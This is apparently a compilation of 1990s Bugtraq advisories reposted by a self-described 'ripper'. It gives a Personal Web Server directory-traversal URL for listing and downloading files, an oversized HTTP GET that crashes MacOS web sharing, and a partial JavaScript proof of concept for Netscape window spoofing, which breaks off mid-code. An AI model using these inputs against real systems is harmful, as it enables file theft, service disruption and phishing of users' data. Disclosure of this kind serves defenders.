more ripped from bugtraq goodiez, this onez GOOD tho :)
While playing with Microsoft Personal Web Server
(Frontpage-PWS32/3.0.2.926).
I found that the following URL will list the root directory and be able to
download any file you want.
http://www.victim.com/....../
Index of /....../
WINDOWS
My Documents
Program Files
FrontPage Webs
AUTOEXEC.BAT
COMMAND.COM
and so on.......
the bugtraq ripper strikes again!*(^!#(* yay!
Sending...
GET aaaaa[...x4000...]aaaaa HTTP/1.0
[followed by pressing return twice]
to port 80 on an Apple Mac, MacOS 8.5.1, with web sharing enabled makes it
change from "Web Sharing On" to "Web Sharing Off", presumably because the web
server task dies. An annoying DoS, possibly worse, who knows (depends if
they compiled with range checking on, what language they used, etc).
-David.
Netscape Communicator window spoofing bug
There is a bug in Netscape Communicator 3.04,4.06,4.5 Win95 and 4.08
WinNT, which allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled he is browising a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number. The bug may be exploited using HTML mail message. It needs Javascript enabled.
Workaround: Disable Javascript
Demonstration is available at:
http://www.nat.bg/~joro/b14.html
http://www.whitehats.com/guninski/b14.html
This bug is different from the "frame spoofing vulnerability"
The code is:
-------------------------------
function doit()
{
a.document.open();
a.document.write("<H1>Look at the location bar!<BR>");
a.document.write("<A HREF='http://www.whitehats.com/guninski'>Go to